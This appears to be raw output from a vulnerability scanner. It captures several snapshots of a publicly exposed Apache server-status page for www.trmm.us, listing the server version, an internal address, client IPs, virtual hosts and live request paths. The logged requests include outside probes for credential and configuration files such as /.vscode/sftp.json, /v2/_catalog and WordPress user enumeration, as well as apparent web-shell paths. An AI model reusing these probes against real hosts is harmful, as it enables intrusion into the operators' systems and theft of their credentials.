168.143.243.31http/1.1 2-01220760/384/3031_ 42.661780.04.1733.73 168.143.243.26http/1.1 2-01220760/369/3021_ 42.90220.07.5843.21 168.143.243.30http/1.1 2-01220760/391/3077_ 42.51600.09.4232.63 168.143.243.15http/1.1 2-01220760/392/3117_ 42.910140.03.9424.64 168.143.243.30http/1.1 2-01220760/384/3025_ 42.95520.012.4148.25 168.143.243.15http/1.1 2-01220760/394/3088_ 42.975320.05.1327.47 168.143.243.15http/1.1 2-01220760/377/3023_ 42.911160.05.0234.70 168.143.243.30http/1.1 2-01220760/382/2988_ 42.901150.05.2042.40 168.143.243.30http/1.1 2-01220760/377/3028_ 43.061722350.07.3438.44 104.14.61.112http/1.1trmm.us:443POST /s/ HTTP/1.1 2-01220760/397/3099_ 42.98340.06.4526.98 168.143.243.30http/1.1 2-01220760/383/3069_ 43.002160.08.88
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597b2ae027a
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Monday, 19-Jun-2023 14:41:29 UTC Restart Time: Monday, 12-Jun-2023 11:39:44 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 7 days 3 hours 1 minute 45 seconds Server load: 0.33 0.27 0.15 Total accesses: 863188 - Total Traffic: 13.4 GB CPU Usage: u768.59 s184.11 cu0 cs0 - .155% CPU load 1.4 requests/sec - 22.8 kB/second - 16.3 kB/request 6 requests currently being processed, 174 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 011301no0yes018000 19522no0yes018000 2122076no0yes018000 324195no8yes414060 421293no1yes018010 582938no2yes018020 6113967no0yes018000 794980no1yes117010 9107391no0yes018000 11114344no1yes117000 Sum10013 61740100 ______________________________________________________W________W _W___W__________________________________________________________ ______W_________..................__________________............ ......_W________________........................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-0113010/317/4598_ 52.00100.04.3448.55 168.143.243.30http/1.1 0-0113010/317/4621_ 52.0528210.03.4748.43 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-0113010/306/4627_ 51.234180.02.1544.19 168.143.243.31http/1.1 0-0113010/327/4663_ 52.00100.02.2846.17 168.143.243.26http/1.1 0-0113010/322/4644_ 52.0626130.04.6562.66 23.205.108.69http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/314/4574_ 51.754160.01.4142.44 168.143.243.15http/1.1 0-0113010/300/4566_ 52.0941230.01.3650.23 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/310/4575_ 52.017200.03.6162.27 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/mod-tools-forward-1.0.js HTTP/1.1 0-0113010/311/4566_ 52.1141220.01.5655.62 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/322/4636_ 51.9841290.01.2959.97 168.143.243.31http/1.1 0-0113010/312/4641_ 52.1041190.08.2355.58 168.143.243.31http/1.1crm.sprout.online:443GET / HTTP/1.1 0-0113010/315/4596_ 51.8966160.01.8545.26 96.7.74.180http/1.1 0-0113010/320/4659_ 51.98400.03.1047.30 168.143.243.31http/1.1 0-0113010/314/4611_ 52.017240.02.3335.63 23.205.108.80http/1.1crm.textripple.com:443GET /mods/js/lylt.js?20201222 HTTP/1.1 0-0113010/329/4647_ 52.004120.06.4653.03 168.143.243.26http/1.1 0-0113010/320/4679_ 52.0437140.05.7158.77 96.7.74.180http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-0113010/319/4612_ 52.00060.04.7361.05 168.143.243.30http/1.1 0-0113010/312/4585_ 51.932774480.03.2143.38 23.205.108.88http/1.1 1-095220/205/2850_ 21.57090.01.0032.88 168.143.243.26http/1.1 1-095220/208/2791_ 21.761140.01.1838.56 168.143.243.30http/1.1 1-095220/208/2823_ 21.761150.01.1132.33 168.143.243.30http/1.1 1-095220/200/2775_ 21.57080.02.6233.41 168.143.243.30http/1.1 1-095220/205/2756_ 21.7611650.01.4824.13 168.143.243.30http/1.1 1-095220/213/2821_ 21.61000.01.5828.78 168.143.243.30http/1.1 1-095220/220/2830_ 21.710110.01.6523.57 168.143.243.30http/1.1 1-095220/199/2810_ 21.57000.03.9835.41 168.143.243.26http/1.1 1-095220/206/2840_ 21.761150.01.4531.69 168.143.243.26http/1.1 1-095220/203/2806_ 21.751160.04.0043.00 168.143.243.26http/1.1 1-095220/210/2816_ 21.71020.01.4037.52 168.143.243.26http/1.1 1-095220/199/2793_ 21.751110.08.4739.67 168.143.243.26http/1.1 1-095220/201/2796_ 21.57090.01.0030.80 168.143.243.30http/1.1 1-095220/207/2780_ 21.741103440.05.3646.10 168.143.243.26http/1.1 1-095220/203/2809_ 21.62000.04.2546.81 168.143.243.26http/1.1 1-095220/204/2789_ 21.740150.02.2841.49 168.143.243.30http/1.1 1-095220/204/2834_ 21.760140.05.5436.71 168.143.243.30http/1.1 1-095220/210/2812_ 21.63020.01.2425.84 168.143.243.26http/1.1 2-01220760/394/3123_ 42.98410.05.0330.70 168.143.243.15http/1.1 2-01220760/389/3077_ 42.9741220.05.7654.00 168.143.243.31http/1.1 2-01220760/391/3057_ 42.99260.05.5535.73 168.143.243.30http/1.1 2-01220760/380/3028_ 42.89121910.03.0425.00 168.143.243.30http/1.1 2-01220760/385/3058_ 42.984330.03.7826.24 168.143.243.15http/1.1 2-01220760/404/3088_ 42.900750.03.7921.42 168.143.243.30http/1.1 2-01220760/383/3037_ 42.51400.01.9831.05 168.143.243.31http/1.1 2-01220760/384/3031_ 42.660780.04.1733.73 168.143.243.26http/1.1 2-01220760/369/3021_ 42.90120.07.5843.21 168.143.243.30http/1.1 2-01220760/391/3077_ 42.51500.09.4232.63 168.143.243.15http/1.1 2-01220760/392/3117_ 42.9138140.03.9424.64 127.0.0.1http/1.1 2-01220760/384/3025_ 42.95420.012.4148.25 168.143.243.15http/1.1 2-01220760/394/3088_ 42.974320.05.1327.47 168.143.243.15http/1.1 2-01220760/377/3023_ 42.910160.05.0234.70 168.143.243.30http/1.1 2-01220760/382/2988_ 42.900150.05.2042.40 168.143.243.30http/1.1 2-01220760/377/3028_ 43.061622350.07.3438.44 104.14.61.112http/1.1trmm.us:443POST /s/ HTTP/1.1 2-01220760/397/3099_ 42.98240.06.4526.98 168.143.243.30http/1.1 2-01220760/383/3069_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597e49d8bb5
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 06-Jun-2023 23:12:12 UTC Restart Time: Thursday, 18-May-2023 19:26:14 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 19 days 3 hours 45 minutes 57 seconds Server load: 0.11 0.71 0.62 Total accesses: 2319393 - Total Traffic: 35.1 GB CPU Usage: u2119.85 s423.41 cu0 cs0 - .154% CPU load 1.4 requests/sec - 22.2 kB/second - 15.9 kB/request 2 requests currently being processed, 178 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0117098no1yes018010 183137no2yes117001 262197no1yes018001 399841no0yes018000 471869no3yes117021 541619no0yes018000 681531no2yes018002 790808no1yes018001 997814no0yes018000 102194no1yes018010 Sum10011 2178046 _________________________________R______________________________ ____________W___________________________________________________ ________________..................______________________________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01170980/716/8723_ 56.21000.06.3599.34 172.104.102.196http/1.1trmm.us:443GET / HTTP/1.1 0-01170980/713/8713_ 56.114600.09.6682.34 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=35868460459373 H 0-01170980/727/8725_ 56.034620.05.19103.98 127.0.0.1http/1.1 0-01170980/730/8734_ 56.19300.04.62138.67 139.59.230.191http/1.1trmm.us:80GET / HTTP/1.1 0-01170980/729/8777_ 56.20200.08.51139.18 139.59.230.191http/1.1trmm.us:80GET /v2/_catalog HTTP/1.1 0-01170980/750/8788_ 56.077780.012.01105.15 157.90.209.77http/1.1 0-01170980/714/8679_ 56.1335130.07.43115.85 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-01170980/721/8733_ 56.1049820.010.35110.77 96.7.74.198http/1.1trmm.us:443GET /public/mms/20221112_185128_UTC_7516387853_0.png HTTP/1.1 0-01170980/715/8736_ 56.19324090.06.1094.33 108.147.101.24http/1.1trmm.us:443POST /s/ HTTP/1.1 0-01170980/707/8716_ 56.124010.05.7083.96 96.7.74.175http/1.1crm.sprout.online:443GET /fonts/Montserrat/Montserrat-Medium.otf HTTP/1.1 0-01170980/716/8779_ 56.124010.010.72114.81 96.7.74.175http/1.1crm.sprout.online:443GET /fonts/Montserrat/Montserrat-Light.otf HTTP/1.1 0-01170980/731/8763_ 56.169150.07.74100.85 96.7.74.175http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-01170980/748/8827_ 56.168820.07.3092.23 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-01170980/711/8751_ 56.12411530.07.0299.93 96.7.74.175http/1.1crm.sprout.online:443GET / HTTP/1.1 0-01170980/722/8728_ 56.201850.05.7689.58 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-01170980/714/8686_ 55.9946170.06.0494.38 127.0.0.1http/1.1 0-01170980/718/8803_ 56.076140.05.09129.63 157.90.209.77http/1.1 0-01170980/745/8777_ 56.073800.04.5689.91 172.104.102.196http/1.1 1-0831370/334/13825_ 34.77200.01.95184.89 139.59.230.191http/1.1trmm.us:80GET /about HTTP/1.1 1-0831370/335/13885_ 34.75689930.03.18156.00 107.77.195.94http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0831370/329/13906_ 34.730870.06.60138.30 104.164.173.3http/1.1 1-0831370/333/13906_ 34.693740.02.60173.57 172.104.102.196http/1.1 1-0831370/321/13928_ 34.7411150.03.28178.39 23.201.57.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/341/13811_ 34.76420.02.86169.29 168.143.243.15http/1.1trmm.us:443GET / HTTP/1.1 1-0831370/328/13859_ 34.79000.06.20185.25 139.59.230.191http/1.1trmm.us:80GET /_all_dbs HTTP/1.1 1-0831370/337/13815_ 34.76410.04.78176.51 139.59.230.191http/1.1trmm.us:80GET / HTTP/1.1 1-0831370/323/13874_ 34.76400.03.87194.95 172.104.102.196http/1.1trmm.us:443GET / HTTP/1.1 1-0831370/335/13834_ 34.711800.02.86194.38 172.104.102.196http/1.1 1-0831370/313/13878_ 34.693820.04.68170.33 172.104.102.196http/1.1 1-0831370/330/13777_ 34.712170.07.27164.32 172.104.102.196http/1.1 1-0831370/322/13849_ 34.7411140.06.82196.25 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/336/13957_ 34.685160.06.13193.02 127.0.0.1http/1.1 1-0831370/322/13883_ 34.755160.08.49229.84 96.7.74.175http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/319/13676R 34.7115120.06.89228.51 172.104.102.196http/1.1 1-0831370/318/13867_ 34.661230.03.72182.72 172.104.102.196http/1.1 1-0831370/324/13920_ 34.712870.03.82188.27 172.104.102.196http/1.1 2-0621970/628/11420_ 135.186870.07.35132.95 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/624/11481_ 134.97219140.06.88146.02 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-0621970/613/11443_ 134.61312140.08.13139.91 127.0.0.1http/1.1 2-0621970/624/11428_ 135.00197830.03.27157.92 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/623/11537_ 134.86314170.08.95162.30 23.201.57.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/616/11421_ 135.0316600.03.46154.31 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=35868340415188 H 2-0621970/625/11524_ 134.89293170.05.56138.87 23.192.164.16http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/600/11367_ 134.69277170.07.98164.82 127.0.0.1http/1.1 2-0621970/622/11422_ 134.84339150.04.77143.64 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/611/11476_ 134.99209160.05.01151.31 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/625/11514_ 135.02179130.03.32132.70 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-0621970/627/11458_ 135.02179910.08.23149.22 96.7.74.198http/1.1crm.sprout.online:443
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597e2ea366c
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Tuesday, 06-Jun-2023 23:12:11 UTC Restart Time: Thursday, 18-May-2023 19:26:14 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 19 days 3 hours 45 minutes 56 seconds Server load: 0.12 0.72 0.62 Total accesses: 2319371 - Total Traffic: 35.1 GB CPU Usage: u2119.76 s423.41 cu0 cs0 - .154% CPU load 1.4 requests/sec - 22.2 kB/second - 15.9 kB/request 1 requests currently being processed, 179 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0117098no1yes018010 183137no2yes018001 262197no1yes018001 399841no0yes018000 471869no3yes117011 541619no0yes018000 681531no2yes018002 790808no0yes018000 997814no0yes018000 102194no1yes018010 Sum10010 1179035 ________________________________________________________________ _______________W________________________________________________ ________________..................______________________________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-01170980/715/8722_ 55.9948530.06.3499.32 96.7.74.198http/1.1trmm.us:443GET /public/mms/20221112_185128_UTC_7516387853_0.png HTTP/1.1 0-01170980/713/8713_ 56.114500.09.6682.34 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=35868460459373 H 0-01170980/727/8725_ 56.034520.05.19103.98 127.0.0.1http/1.1 0-01170980/730/8734_ 56.19200.04.62138.67 139.59.230.191http/1.1trmm.us:80GET / HTTP/1.1 0-01170980/729/8777_ 56.20000.08.51139.18 139.59.230.191http/1.1trmm.us:80GET /v2/_catalog HTTP/1.1 0-01170980/750/8788_ 56.076780.012.01105.15 157.90.209.77http/1.1 0-01170980/714/8679_ 56.1334130.07.43115.85 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 0-01170980/721/8733_ 56.1048820.010.35110.77 96.7.74.198http/1.1trmm.us:443GET /public/mms/20221112_185128_UTC_7516387853_0.png HTTP/1.1 0-01170980/715/8736_ 56.19224090.06.1094.33 108.147.101.24http/1.1trmm.us:443POST /s/ HTTP/1.1 0-01170980/707/8716_ 56.123910.05.7083.96 96.7.74.175http/1.1crm.sprout.online:443GET /fonts/Montserrat/Montserrat-Medium.otf HTTP/1.1 0-01170980/716/8779_ 56.123910.010.72114.81 96.7.74.175http/1.1crm.sprout.online:443GET /fonts/Montserrat/Montserrat-Light.otf HTTP/1.1 0-01170980/731/8763_ 56.168150.07.74100.85 96.7.74.175http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-01170980/748/8827_ 56.167820.07.3092.23 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-01170980/711/8751_ 56.12401530.07.0299.93 96.7.74.175http/1.1crm.sprout.online:443GET / HTTP/1.1 0-01170980/722/8728_ 56.200850.05.7689.58 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-01170980/714/8686_ 55.9945170.06.0494.38 127.0.0.1http/1.1 0-01170980/718/8803_ 56.075140.05.09129.63 157.90.209.77http/1.1 0-01170980/745/8777_ 56.072800.04.5689.91 172.104.102.196http/1.1 1-0831370/334/13825_ 34.77100.01.95184.89 139.59.230.191http/1.1trmm.us:80GET /about HTTP/1.1 1-0831370/335/13885_ 34.75489930.03.18156.00 107.77.195.94http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0831370/329/13906_ 34.7312870.06.60138.30 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/333/13906_ 34.692740.02.60173.57 172.104.102.196http/1.1 1-0831370/321/13928_ 34.7410150.03.28178.39 23.201.57.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/341/13811_ 34.76320.02.86169.29 168.143.243.15http/1.1trmm.us:443GET / HTTP/1.1 1-0831370/327/13858_ 34.7213160.06.20185.25 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/337/13815_ 34.76310.04.78176.51 139.59.230.191http/1.1trmm.us:80GET / HTTP/1.1 1-0831370/323/13874_ 34.76300.03.87194.95 172.104.102.196http/1.1trmm.us:443GET / HTTP/1.1 1-0831370/335/13834_ 34.710800.02.86194.38 172.104.102.196http/1.1 1-0831370/313/13878_ 34.692820.04.68170.33 172.104.102.196http/1.1 1-0831370/330/13777_ 34.711170.07.27164.32 172.104.102.196http/1.1 1-0831370/322/13849_ 34.7410140.06.82196.25 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/336/13957_ 34.684160.06.13193.02 127.0.0.1http/1.1 1-0831370/322/13883_ 34.754160.08.49229.84 96.7.74.175http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0831370/319/13676_ 34.7114120.06.89228.51 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0831370/318/13867_ 34.660230.03.72182.72 172.104.102.196http/1.1 1-0831370/324/13920_ 34.711870.03.82188.27 172.104.102.196http/1.1 2-0621970/628/11420_ 135.185870.07.35132.95 23.205.108.80http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/624/11481_ 134.97218140.06.88146.02 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-0621970/613/11443_ 134.61311140.08.13139.91 127.0.0.1http/1.1 2-0621970/624/11428_ 135.00196830.03.27157.92 23.220.96.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/623/11537_ 134.86313170.08.95162.30 23.201.57.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/616/11421_ 135.0316500.03.46154.31 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=35868340415188 H 2-0621970/625/11524_ 134.89292170.05.56138.87 23.192.164.16http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/600/11367_ 134.69276170.07.98164.82 127.0.0.1http/1.1 2-0621970/622/11422_ 134.84338150.04.77143.64 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/611/11476_ 134.99208160.05.01151.31 96.7.74.198http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0621970/625/11514_ 135.02178130.03.32132.70 96.7.74.198http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-0621970/627/11458_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c597b630289d
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 02-Apr-2023 18:14:24 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 61 days 1 minute 25 seconds Server load: 0.26 0.17 0.27 Total accesses: 9431833 - Total Traffic: 231.4 GB CPU Usage: u1326.67 s204.97 cu0 cs0 - .0291% CPU load 1.79 requests/sec - 46.0 kB/second - 25.7 kB/request 5 requests currently being processed, 175 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0627no0yes018000 180709no1yes018001 273616no1yes018001 415564no0yes018000 549980no2yes117011 659512no5yes018005 760182no3yes216010 854713no8yes216053 9108749no2yes018002 1098335no1yes018001 Sum10023 51750714 ______________________________________________________.......... ........__________________________L_____________________________ _W_________W_____________W_W____________________________________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-06270/284/47886_ 36.573100.04.881049.22 127.0.0.1http/1.1 0-06270/294/47789_ 36.7056180.09.791033.94 127.0.0.1http/1.1 0-06270/285/48076_ 36.58157750.07.671147.46 127.0.0.1http/1.1 0-06270/295/47974_ 36.75159170.012.021033.49 23.59.176.70http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/290/47777_ 36.8011710.06.621091.32 78.128.113.142http/1.1lhsrwdz.com:443GET /wikindex.php?f=/NmRtJOUjAdutReQj/scRjKUhleBpzmTyO.txt HTTP 0-06270/305/48158_ 36.59143160.07.101141.03 157.90.181.149http/1.1 0-06270/304/48088_ 36.58161740.09.121060.07 127.0.0.1http/1.1 0-06270/300/47925_ 36.63136210.03.08915.10 127.0.0.1http/1.1 0-06270/294/48151_ 36.8299160.06.171150.31 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/291/47969_ 36.9225140.06.111000.93 206.174.62.240http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 0-06270/292/47868_ 36.913120.08.981035.16 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-06270/292/47844_ 36.8937170.07.83998.79 72.93.152.110http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 0-06270/308/48016_ 36.8748150.07.051046.57 69.178.48.170http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 0-06270/304/47851_ 36.8563750.06.271080.97 165.254.96.10http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/304/48001_ 36.81108740.08.78992.07 165.254.96.15http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 0-06270/308/48062_ 36.865620.02.241124.43 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 0-06270/296/48065_ 36.847300.010.281025.11 78.128.113.142http/1.1lhsrwdz.com:80GET /radio.php HTTP/1.1 0-06270/307/47901_ 36.95410.06.071035.49 64.227.126.135http/1.1trmm.us:443GET /debug/default/view?panel=config HTTP/1.1 1-0807090/703/45416_ 146.5230770.025.851033.33 23.201.57.165http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/714/45289_ 146.55600.033.461017.73 165.232.76.155http/1.1trmm.us:80GET /.vscode/sftp.json HTTP/1.1 1-0807090/694/45338_ 146.514700.016.20986.04 78.128.113.142http/1.1lhsrwdz.com:80GET /lock360.php?daksldlkdsadas=1 HTTP/1.1 1-0807090/703/45316_ 146.41129140.025.161058.29 104.28.48.229http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 1-0807090/707/45344_ 146.3023600.024.201065.42 127.0.0.1http/1.1localhost:443GET /dynatraceApacheQueuingTimeCheck?timestamp=30234401910172 H 1-0807090/710/45146_ 146.0559790.025.061075.67 174.215.19.190http/1.1 1-0807090/694/45252_ 146.55610.020.651020.04 165.232.76.155http/1.1trmm.us:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-0807090/698/45048_ 146.4312349170.020.891018.02 104.28.48.229http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0807090/701/45228_ 146.573690.021.80967.70 96.7.74.175http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 1-0807090/700/45263_ 146.55600.011.391143.14 165.232.76.155http/1.1localhost:80HELP 1-0807090/687/45389_ 146.4690780.07.881047.28 23.205.108.69http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/710/45252_ 145.59236160.019.951037.21 127.0.0.1http/1.1 1-0807090/699/45213_ 146.5139720.022.241022.53 23.59.176.70http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/702/45190_ 146.55600.09.741043.34 165.232.76.155http/1.1trmm.us:80GET /v2/_catalog HTTP/1.1 1-0807090/687/45196_ 146.4961117720.024.861070.45 174.215.19.190http/1.1trmm.us:443POST /s/ HTTP/1.1 1-0807090/680/45270_ 146.31229150.028.81943.67 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/696/45265_ 146.332081680.018.901032.63 23.59.176.70http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 1-0807090/691/45188_ 146.56300.020.631082.37 64.227.126.135http/1.1trmm.us:443GET /login.action HTTP/1.1 2-0736160/567/44110_ 106.591001040.05.79945.74 73.8.249.76http/1.1trmm.us:443POST /wallet/ajax-wallet.php HTTP/1.1 2-0736160/557/44120_ 106.5019630.013.051001.92 127.0.0.1http/1.1localhost:80GET /server-status?auto HTTP/1.1 2-0736160/557/44275_ 106.6819167280.07.051074.92 72.217.25.166http/1.1trmm.us:443POST /s/ HTTP/1.1 2-0736160/559/43956_ 106.401600.011.721001.68 127.0.0.1http/1.1 2-0736160/552/44183_ 106.71600.014.56945.62 96.7.74.175http/1.1trmm.us:443GET /.vscode/sftp.json HTTP/1.1 2-0736160/549/44189_ 106.6365720.014.531012.19 23.77.218.214http/1.1crm.sprout.online:443GET /login.php HTTP/1.1 2-0736160/574/44212_ 106.6188560.011.41982.81 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0736160/554/43909_ 106.6734810.07.41909.02 23.59.176.71http/1.1crm.sprout.online:443POST /mods/ajax-ripples.php HTTP/1.1 2-0736160/555/44098_ 106.23196700.015.59939.38 127.0.0.1http/1.1 2-0736160/551/43944_ 106.71600.07.22947.17 96.7.74.175http/1.1trmm.us:443GET /login.action HTTP/1.1 2-0736160/549/44181_ 106.71500.014.951005.45 96.7.74.175http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31ff87c597ff87c59722f57ffb
Apache Status Apache Server Status for www.trmm.us (via 172.31.38.193) Server Version: Apache/2.4.25 (Unix) OpenSSL/1.0.2j Server MPM: event Server Built: Dec 21 2016 11:30:10 Current Time: Sunday, 02-Apr-2023 18:14:23 UTC Restart Time: Tuesday, 31-Jan-2023 18:12:59 UTC Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 61 days 1 minute 24 seconds Server load: 0.26 0.17 0.27 Total accesses: 9431817 - Total Traffic: 231.4 GB CPU Usage: u1326.64 s204.95 cu0 cs0 - .0291% CPU load 1.79 requests/sec - 46.0 kB/second - 25.7 kB/request 5 requests currently being processed, 175 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0627no0yes018000 180709no1yes018001 273616no1yes018001 415564no0yes018000 549980no1yes117001 659512no5yes018005 760182no1yes315000 854713no5yes117013 9108749no2yes018002 1098335no1yes018001 Sum10017 51750114 ______________________________________________________.......... ........________________________________R_______________________ _W_____W_______W_____________W__________________________________ ______.......................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending 